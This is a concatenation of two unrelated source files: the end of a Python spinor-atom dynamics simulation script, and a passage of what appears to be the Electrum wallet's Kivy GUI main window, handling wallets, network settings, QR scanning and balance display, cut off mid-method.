'eqz': eqz,
'ndiv': ndiv,
'delta_t': delta_t,
'c': c,
'emw': emw,
'n_step': n_step,
'alpha_minus': alpha_minus,
'alpha_plus': alpha_plus,
'alpha_zero': alpha_zero,
'norm_factor': norm_factor
}
# set up multiprocessing
queue = Queue()
procs = {}
# now loop over and send to difference processors
for m in range(mag - mag_range, mag + mag_range + 1):
k = m - (mag - mag_range)
procs[k] = Process(target=calc_m_loop, args=(queue, m, params))
procs[k].start()
# get the results
for m in range(mag - mag_range, mag + mag_range + 1):
k = m - (mag - mag_range)
ans = queue.get()
time[k] = ans[0]
sum_of_means[k] = ans[1]
sum_of_meansq[k] = ans[2]
norm[k] = ans[3]
# sum the results
time = time[0]
sum_of_means = np.sum(sum_of_means, axis=0)
sum_of_meansq = np.sum(sum_of_meansq, axis=0)
norm = np.sum(norm, axis=0)
return sum_of_means, sum_of_meansq, norm, time
if __name__ == '__main__':
init_state_solver = 'coherent_state'
propogate = 'Chebychev'
species = 'Na'
b_field = 0 # BField in microtesla
n_tot = 2000 # TotalAtomNumber
mag = 0 # Magnetization
mag_range = 2 # MagRange
atom_range = 2 # AtomRange
spinor_phase = 0 # SpinorPhase
    n_0 = n_tot - 2  # N_0: number of atoms starting in m=0
c_init = 24 # C_init in Hz
filename = 'results.txt'
ndiv = 3
delta_t = [0.04, 0.001, 0.06]
c = [c_init, c_init, c_init]
emw = [-2.5, -426, -2.5]
n_step = [30, 6, 30]
start = timemod.time()
sum_of_means, sum_of_meansq, norm, time = solve_system(b_field,
n_tot, mag, mag_range, atom_range, spinor_phase, n_0, ndiv, delta_t, c, emw, n_step)
    # eqz is computed inside solve_system() but is also needed for the output file,
    # so compute it here as well (quadratic Zeeman shift in Hz from the B field).
    eqz = np.real(0.0277 * b_field**2)
    write_out(filename, b_field, n_0, c_init, n_tot, mag, mag_range, atom_range,
              spinor_phase, init_state_solver, propogate, delta_t, emw, eqz,
              c, n_step, sum_of_means, sum_of_meansq, norm, time)
end = timemod.time()
print('Calculation Complete')
print('Norm recovered', np.average(norm))
print('Time for Calculation:', end - start)
print('File written to:', filename)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
PR_PAID, PR_FAILED, maybe_extract_bolt11_invoice)
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import PasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register a widget cache to keep memory usage down; the timeout is set so the
# data stays cached forever
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
from electrum.interface import ServerAddr
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = req['status']
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, key):
self.show_info(_('Payment was sent'))
self._trigger_update_history()
def on_payment_failed(self, event, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
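    # Illustrative sketch (comments only, not executed): how the three helpers
    # above fit together, assuming base_unit == 'mBTC' (decimal_point() == 5)
    # and an exchange rate of 20000 fiat units per BTC.  The numbers are made
    # up for the example, not produced by this code:
    #
    #   get_amount('1.5 mBTC')  -> int(10**5 * 1.5)         == 150000 sat
    #   btc_to_fiat('1.5')      -> 150000 * 20000 / 10**8   == 30.0, shown '30'
    #   fiat_to_btc('30')       -> int(10**8 * 30 / 20000)  == 150000 sat,
    #                              formatted back as '1.5' with decimal_point 5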
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Orientation of the app window.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that the GUI is updated at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._pincode_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data[15:])
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key, is_lightning=is_lightning)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
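    # Illustrative usage sketch (assumed caller, not part of this method): a
    # screen that wants to scan a QR code passes a one-argument callback that
    # receives the decoded string once SimpleScannerActivity returns, e.g.
    #
    #   self.scan_qr(on_complete=self.on_qr)  # feed results to the generic
    #                                         # QR handler defined above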
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
        ''' This is the entry point of the Kivy UI.
        '''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
def on_success(x):
# save password in memory
self.password = x
self.load_wallet(wallet)
self.password_dialog(
basename = wallet.basename(),
check_password=wallet.check_password,
on_success=on_success,
on_failure=self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path)
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
if storage.is_encrypted():
if not storage.is_encrypted_with_user_pw():
raise Exception("Kivy GUI does not support this type of encrypted wallet files.")
def on_password(pw):
self.password = pw
storage.decrypt(pw)
self._on_decrypted_storage(storage)
self.password_dialog(
basename = storage.basename(),
check_password=storage.check_password,
on_success=on_password,
on_failure=self.stop)
return
self._on_decrypted_storage(storage)
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.path = os.path.dirname(self.electrum_config.get_wallet_path())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the
        basic tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 5*60:
self.pincode_dialog(check_password=self.check_pin_code, on_success=None, on_failure=self.stop)
if self.nfcscanner:
